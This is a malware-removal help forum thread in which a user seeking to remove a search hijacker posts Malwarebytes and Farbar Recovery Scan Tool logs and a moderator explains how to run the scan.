      O23 - Service: @%SystemRoot%\system32\trkwks.dll,-1 (TrkWks) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\WINDOWS\servicing\TrustedInstaller.exe
      O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\umrdp.dll,-1000 (UmRdpService) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%systemroot%\system32\upnphost.dll,-213 (upnphost) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
      O23 - Service: @%systemroot%\system32\vmicres.dll,-801 (vmicguestinterface) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vmicres.dll,-101 (vmicheartbeat) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vmicres.dll,-201 (vmickvpexchange) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vmicres.dll,-601 (vmicrdv) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vmicres.dll,-301 (vmicshutdown) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vmicres.dll,-401 (vmictimesync) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vmicres.dll,-501 (vmicvss) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\w32time.dll,-200 (W32Time) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
      O23 - Service: @%systemroot%\system32\wbiosrvc.dll,-100 (WbioSrvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\wcmsvc.dll,-4097 (Wcmsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wcncsvc.dll,-3 (wcncsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\WcsPlugInService.dll,-200 (WcsPlugInService) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\wdi.dll,-502 (WdiServiceHost) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%systemroot%\system32\wdi.dll,-500 (WdiSystemHost) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
      O23 - Service: @%systemroot%\system32\webclnt.dll,-100 (WebClient) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wecsvc.dll,-200 (Wecsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%systemroot%\system32\wephostsvc.dll,-100 (WEPHOSTSVC) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\wercplsupport.dll,-101 (wercplsupport) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\wersvc.dll,-100 (WerSvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wiarpc.dll,-2 (WiaRpc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
      O23 - Service: @%SystemRoot%\system32\winhttp.dll,-100 (WinHttpAutoProxySvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%Systemroot%\system32\wbem\wmisvc.dll,-205 (Winmgmt) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%Systemroot%\system32\wsmsvc.dll,-101 (WinRM) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\wlansvc.dll,-257 (WlanSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wlidsvc.dll,-100 (wlidsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
      O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
      O23 - Service: @%systemroot%\system32\workfolderssvc.dll,-102 (workfolderssvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wpcsvc.dll,-100 (WPCSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wpdbusenum.dll,-100 (WPDBusEnum) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\wscsvc.dll,-200 (wscsvc) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%systemroot%\system32\SearchIndexer.exe,-103 (WSearch) - Unknown owner - C:\WINDOWS\system32\SearchIndexer.exe
      O23 - Service: @%SystemRoot%\system32\WSService.dll,-103 (WSService) - Unknown owner - C:\WINDOWS\System32\svchost.exe
      O23 - Service: @%systemroot%\system32\wuaueng.dll,-105 (wuauserv) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\system32\wudfsvc.dll,-1000 (wudfsvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe
      O23 - Service: @%SystemRoot%\System32\wwansvc.dll,-257 (WwanSvc) - Unknown owner - C:\WINDOWS\system32\svchost.exe

      --
      End of file - 32257 bytes

    2. #2
      General Moderator
      Avatar of @Daniela
      Registered
      Apr 2011
      Location
      Spain
      Posts
      23,121

      Re: Remove qtipr.com

      Hi Darkor

      Post the Malwarebytes and AdwCleaner reports so they can be reviewed.

      Download Farbar Recovery Scan Tool according to your system architecture (32 or 64 bits)

      • Save it to the desktop >> This is very important.
      • Double-click to run Frst.exe. (If you use Windows Vista/7/8 or 10, right-click and select "Run as Administrator.")
      • In the Disclaimer window, press Yes.

      • In the new window that opens, press the Scan button and wait patiently for the scan to finish.
      • Two (2) files (logs) will open, Frst.txt and Addition.txt; these will be saved on your desktop.

      • To finish, open the files Frst.txt and Addition.txt, then copy and paste all of their contents into your next reply. Use two messages if it tells you it is too long.


      Regards
      ✿◕‿◕✿ Impatience is not good company ✿◕‿◕✿

      * Follow us on our Twitter and become our friend on Facebook.
      * Keep up with the latest threats on the net at: InfoSpyware Blog
      * Questions are not answered by private message or by e-mail, since that is what the forum is for.

    3. #3
      User Avatar of Darkor
      Registered
      Oct 2006
      Location
      Spain
      Posts
      9

      Re: Remove qtipr.com

      Thanks for replying.

      I ran two scans today with Malwarebytes. The first is this one, where it found threats that it put in quarantine, and they are still there.

      First scan with Malwarebytes

      Malwarebytes
      www.malwarebytes.com

      -Detalles del registro-
      Fecha del análisis: 16/2/17
      Hora del análisis: 21:35
      Archivo de registro: malwareanalisis.txt
      Administrador: Sí

      -Información del software-
      Versión: 3.0.6.1469
      Versión de los componentes: 1.0.50
      Versión del paquete de actualización: 1.0.1281
      Licencia: Premium

      -Información del sistema-
      SO: Windows 8.1
      CPU: x64
      Sistema de archivos: NTFS
      Usuario: ALBERTO\Alberto

      -Resumen del análisis-
      Tipo de análisis: Análisis rápido
      Resultado: Completado
      Objetos analizados: 1983
      Tiempo transcurrido: 0 min, 22 seg

      -Opciones de análisis-
      Memoria: Activado
      Inicio: Desactivado
      Sistema de archivos: Desactivado
      Archivo: Activado
      Rootkits: Desactivado
      Heurística: Desactivado
      PUP: Activado
      PUM: Activado

      -Detalles del análisis-
      Proceso: 0
      (No hay elementos maliciosos detectados)

      Módulo: 1
      Trojan.ProxyHijacker, C:\USERS\ALBERTO\APPDATA\LOCAL\GDNBKL.DLL, En cuarentena, [517], [371698],1.0.1281

      Clave del registro: 1
      Trojan.ProxyHijacker, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES, En cuarentena, [517], [-1],0.0.0

      Valor del registro: 6
      Trojan.ProxyHijacker, HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|gdnbkl, En cuarentena, [517], [371698],1.0.1281
      Trojan.ProxyHijacker, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, En cuarentena, [517], [-1],0.0.0
      Trojan.ProxyHijacker, HKU\S-1-5-19\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, En cuarentena, [517], [-1],0.0.0
      Trojan.ProxyHijacker, HKU\S-1-5-20\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, En cuarentena, [517], [-1],0.0.0
      Trojan.ProxyHijacker, HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, En cuarentena, [517], [-1],0.0.0
      Trojan.ProxyHijacker, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, En cuarentena, [517], [-1],0.0.0

      Datos del registro: 0
      (No hay elementos maliciosos detectados)

      Secuencia de datos: 0
      (No hay elementos maliciosos detectados)

      Carpeta: 0
      (No hay elementos maliciosos detectados)

      Archivo: 1
      Trojan.ProxyHijacker, C:\USERS\ALBERTO\APPDATA\LOCAL\GDNBKL.DLL, En cuarentena, [517], [371698],1.0.1281

      Sector físico: 0
      (No hay elementos maliciosos detectados)


      (end)

      Second scan with Malwarebytes

      Malwarebytes
      www.malwarebytes.com

      -Detalles del registro-
      Fecha del análisis: 16/2/17
      Hora del análisis: 22:56
      Archivo de registro: malwareanalisis2.txt
      Administrador: Sí

      -Información del software-
      Versión: 3.0.6.1469
      Versión de los componentes: 1.0.50
      Versión del paquete de actualización: 1.0.1281
      Licencia: Premium

      -Información del sistema-
      SO: Windows 8.1
      CPU: x64
      Sistema de archivos: NTFS
      Usuario: ALBERTO\Alberto

      -Resumen del análisis-
      Tipo de análisis: Análisis rápido
      Resultado: Completado
      Objetos analizados: 2169
      Tiempo transcurrido: 0 min, 44 seg

      -Opciones de análisis-
      Memoria: Activado
      Inicio: Desactivado
      Sistema de archivos: Desactivado
      Archivo: Activado
      Rootkits: Desactivado
      Heurística: Desactivado
      PUP: Activado
      PUM: Activado

      -Detalles del análisis-
      Proceso: 0
      (No hay elementos maliciosos detectados)

      Módulo: 0
      (No hay elementos maliciosos detectados)

      Clave del registro: 0
      (No hay elementos maliciosos detectados)

      Valor del registro: 0
      (No hay elementos maliciosos detectados)

      Datos del registro: 0
      (No hay elementos maliciosos detectados)

      Secuencia de datos: 0
      (No hay elementos maliciosos detectados)

      Carpeta: 0
      (No hay elementos maliciosos detectados)

      Archivo: 0
      (No hay elementos maliciosos detectados)

      Sector físico: 0
      (No hay elementos maliciosos detectados)


      (end)

      Scan with Farbar Recovery

      Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-02-2017 02
      Ran by Alberto (administrator) on ALBERTO (16-02-2017 23:02:14)
      Running from C:\Users\Alberto\Desktop
      Loaded Profiles: Alberto (Available Profiles: Alberto)
      Platform: Windows 8.1 (Update) (X64) Language: Español (España, internacional)
      Internet Explorer Version 11 (Default browser: IE)
      Boot Mode: Normal
      Tutorial for Farbar Recovery Scan Tool: ***********************************************************************************************************

      ==================== Processes (Whitelisted) =================

      (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

      (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
      (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
      (Microsoft Corporation) C:\Windows\System32\wlanext.exe
      (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
      (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
      () C:\Program Files (x86)\Realtek\Realtek Bluetooth\BTDevMgr.exe
      (Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
      (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
      (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
      (LENOVO INCORPORATED.) C:\Program Files\Lenovo\iMController\SystemAgentService.exe
      (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
      (Conexant Systems, Inc.) C:\Windows\SysWOW64\SASrv.exe
      (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
      (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
      (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
      (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
      (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
      (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDIntelligent.exe
      (Realtek Semiconductor Corporation) C:\Program Files (x86)\Realtek\Realtek Bluetooth\BTServer.exe
      (Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
      (CyberLink Corp.) C:\Program Files (x86)\Lenovo\PowerDVD10\PDVD10Serv.exe
      (Intel Corporation) C:\Windows\System32\igfxtray.exe
      (Intel Corporation) C:\Windows\System32\hkcmd.exe
      (Intel Corporation) C:\Windows\System32\igfxpers.exe
      (Intel Corporation) C:\Windows\System32\igfxsrvc.exe
      (Realtek semiconductor) C:\Windows\RTFTrack.exe
      (Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe
      () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
      (Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe
      (Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\utility.exe
      (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
      (Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe
      (Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
      (Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
      (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
      (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
      (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler.exe
      (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.32.7\GoogleCrashHandler64.exe
      () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
      (Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
      (Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
      (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
      (Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\CCLibrary.exe
      (Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\libs\node.exe
      (HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
      (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
      (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
      (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
      (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
      (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
      (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

      ==================== Registry (Whitelisted) ====================

      (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

      HKLM\...\Run: [Nvtmru] => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe"
      HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
      HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2891080 2013-10-17] (ELAN Microelectronics Corp.)
      HKLM\...\Run: [BtServer] => C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTServer.exe [216064 2014-01-06] (Realtek Semiconductor Corporation)
      HKLM\...\Run: [RtsFT] => C:\WINDOWS\RTFTrack.exe [6340312 2013-12-23] (Realtek semiconductor)
      HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [907480 2013-09-04] (Conexant Systems, Inc.)
      HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] ()
      HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1647616 2012-06-13] (Conexant Systems, Inc.)
      HKLM\...\Run: [Energy Manager] => C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe [15813616 2014-05-09] (Lenovo(beijing) Limited)
      HKLM\...\Run: [Lenovo Utility] => C:\Program Files (x86)\Lenovo\Energy Manager\Utility.exe [80880 2014-05-09] (Lenovo(beijing) Limited)
      HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2403288 2014-08-09] (NVIDIA Corporation)
      HKLM\...\Run: [ShadowPlay] => C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
      HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
      HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
      HKLM-x32\...\Run: [UpdateP2GShortCut] => C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [214312 2011-12-06] (CyberLink Corp.)
      HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
      HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
      HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
      HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
      HKLM-x32\...\Run: [] => [X]
      HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2384984 2016-12-09] (Adobe Systems Incorporated)
      Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [AdobeBridge] => [X]
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [Power2GoExpress] => NA
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [HP ENVY 4500 series (NET)] => C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe [3487240 2014-07-21] (Hewlett-Packard Development Company, LP)
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [Chromium] => "c:\users\alberto\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [TalkHelper] => "C:\Program Files (x86)\TalkHelper Call Recorder for Skype\TalkHelper.exe" /autostart
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9363672 2017-02-08] (Piriform Ltd)
      ShellExecuteHooks: No Name - {F294D2AE-ECCF-11E6-85D5-64006A5CFC23} - C:\Users\Alberto\AppData\Roaming\Bserpy\Phasother.dll -> No File
      ShellExecuteHooks: No Name - {0C7A9190-EE8C-11E6-BCD2-64006A5CFC23} - C:\Users\Alberto\AppData\Roaming\Thugagh\Acgemaguty.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
      ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
      ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
      ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      Startup: C:\Users\Alberto\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk [2016-01-29]
      ShortcutTarget: Adobe Gamma.lnk -> C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
      GroupPolicy: Restriction - Chrome <======= ATTENTION
      CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

      ==================== Internet (Whitelisted) ====================

      (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

      Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
      Tcpip\Parameters: [DhcpNameServer] 212.40.224.73 62.42.230.24
      Tcpip\..\Interfaces\{1FC9537B-D9EE-484F-8717-EBB24723B0F6}: [DhcpNameServer] 212.40.224.73 62.42.230.24
      Tcpip\..\Interfaces\{7E1BA411-4F4C-49BD-B8C1-A175BEF666A0}: [DhcpNameServer] 172.16.136.2
      Tcpip\..\Interfaces\{CD4BB8C7-8D07-490D-A1EF-88B67DEA2363}: [DhcpNameServer] 212.40.224.73 62.42.230.24

      Internet Explorer:
      ==================
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
      HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
      HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
      HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
      HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
      HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
      HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
      HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
      HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
      HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://goojile.info/?ri=1&uid=60a5532a2e2eeeab9b911a64bf743a26&q={searchTerms}
      SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
      SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
      SearchScopes: HKLM-x32 -> DefaultScope value is missing
      SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
      SearchScopes: HKU\S-1-5-21-1830392043-3884525579-1098650476-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3C} URL = hxxp://goojile.info/?ri=1&uid=60a5532a2e2eeeab9b911a64bf743a26&q={searchTerms}
      SearchScopes: HKU\S-1-5-21-1830392043-3884525579-1098650476-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3D} URL = hxxp://goojile.info/?ri=1&uid=60a5532a2e2eeeab9b911a64bf743a26&q=
      SearchScopes: HKU\S-1-5-21-1830392043-3884525579-1098650476-1002 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
      SearchScopes: HKU\S-1-5-21-1830392043-3884525579-1098650476-1002 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
      SearchScopes: HKU\S-1-5-21-1830392043-3884525579-1098650476-1002 -> {404BAF98-F2E7-4183-8931-01C1F576C860} URL = hxxp://www.google.com/search?q={searchTerms}
      BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2016-12-13] (Microsoft Corporation)
      BHO: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\hMrsfBZ.dll => No File
      BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2016-11-15] (Microsoft Corporation)
      BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2016-12-13] (Microsoft Corporation)
